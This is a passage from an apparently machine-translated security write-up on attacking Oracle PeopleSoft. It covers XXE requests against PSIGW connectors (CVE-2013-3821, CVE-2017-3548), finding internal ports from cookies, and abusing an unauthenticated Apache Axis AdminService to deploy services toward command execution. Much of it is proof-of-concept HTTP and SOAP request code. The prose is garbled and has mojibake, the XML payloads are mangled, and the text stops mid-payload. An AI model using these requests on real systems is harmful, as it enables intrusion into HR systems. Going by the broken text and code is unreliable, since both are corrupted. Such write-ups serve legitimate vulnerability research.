! [](/Article/UploadPic/2017-5/20175319508171. png? www. myhack58. com)
A few months ago, I had the privilege of participating in several of Oracle’s PeopleSoft construction project Safety Audit, the audit object mainly for the PeopleSoft series of Human Resources Management System, HRMS, and development tools package PeopleTool it. Throughout the online on the PeopleSoft security profile, in addition to a few unable to confirm the CVE vulnerability reference is outside, it is only ERPScan two years ago HITB conference a great amount of speech. According to ERPScan’s speech PDF I found that although online fresh with PeopleSoft security information, but it is in fact a vulnerability ridden.
Only from my hand of security testing point of view, PeopleSoft application contains a lot of not proven authorization service endpoint, may be for high interactivity, these services end, most of them use a default password. This fragile security environment obvious to the attacker open a door window. In this article, I will show how to use a XXE vulnerability to mention the right to execute a system command, the problem may affect all the current PeopleSoft version of the software.
XXE vulnerability to get local access to the network
PeopleSoft there are multiple XXE vulnerabilities, such as the early years of the CVE-2013-3800 and CVE-2013-3821, the latest of ERPScan found that the CVE-2017-3548ã Generally speaking, it can exploit these vulnerabilities to obtain PeopleSoft and WebLogic control terminal of password information, but in the test environment the success of this method implementation requires a certain degree of difficulty. In addition, since CVE-2017-3548 for Bind-XXE vulnerability, and I think the target network system may be deployed with a firewall, so, using the XXE vulnerability to steal system information is not like imagination of so simple. Here, we take a look at CVE-2013-3821 and CVE-2017-3548 PoC exploit code:
CVE-2013-3821: integrated gateway HttpListeningConnector XXE
POST /PSIGW/HttpListeningConnector HTTP/1.1
Host: website.com
Content-Type: application/xml
…
]>
IBRequest>
ExternalOperationName>& x;ExternalOperationName>
OperationType/>
From>RequestingNode/>
Password/>
OrigUser/>
OrigNode/>
OrigProcess/>
OrigTimeStamp/>
From>
To>
FinalDestination/>
DestinationNode/>
SubChannel/>
To>
ContentSections>
ContentSection>
NonRepudiation/>
MessageVersion/>
Data>your_message_content]]>
Data>
ContentSection>
ContentSections>
IBRequest>
CVE-2017-3548: integrated gateway PeopleSoftServiceListeningConnector XXE
POST /PSIGW/PeopleSoftServiceListeningConnector HTTP/1.1
Host: website.com
Content-Type: application/xml
…
Another way to think of it, I think you can use the XXE vulnerability to access local server localhost the various services, and perhaps this also can bypass the firewall rules or the authentication check. Therefore, here only need to know the PeopleSoft service port. In the end, I get by it to access the page for the cookie to identify the port information:
Set-Cookie: SNP2118-51500-PORTAL-PSJSESSIONID=9JwqZVxKjzGJn1s5DLf1t46pz91FFb3p! -1515514079;
As can be seen, the current PeopleSoft service port is 5100, can through https://localhost:51500/access to the corresponding application.
Apache Axis service using
In PeopleSoft architecture, in which an unauthenticated authorization of service by the https://website. com/pspc/services access to the Apache Axis 1.4 in. The Apache Axis service allows us to from a Java class to build the SOAP terminal, and then use the generated Web Services Description Language-WSDLï¼with the auxiliary code and the terminal to interact. We can through https://website. com/pspc/services/AdminService for Apache Axis Service Management:
! [](/Article/UploadPic/2017-5/20175319508321. png? www. myhack58. com)
The following is the Apache Axis admin based on java. util. The Random class to create the SOAP service end of the POST code, from the code, we can see some specific service to create a way of:
POST /pspc/services/AdminService
Host: website.com
SOAPAction: something
Content-Type: application/xml
…
soapenv:Envelope xmlns:xsi=”https://www.w3.org/2001/XMLSchema-instance”
xmlns:api=”https://127.0.0.1/Integrics/Enswitch/API”
xmlns:xsd=”https://www.w3.org/2001/XMLSchema”
xmlns:soapenv=”https://schemas.xmlsoap.org/soap/envelope/”>
soapenv:Body>
ns1:deployment
xmlns=”https://xml.apache.org/axis/wsdd/”
xmlns:java=”https://xml.apache.org/axis/wsdd/providers/java”
xmlns:ns1=”https://xml.apache.org/axis/wsdd/”>
ns1:service name=”RandomService” provider=”java:RPC”>
**[1] [[2]]() [[3]]() [[4]]() [[5]]() [[6]]() [[7]]() [[8]]() [next]()**Read More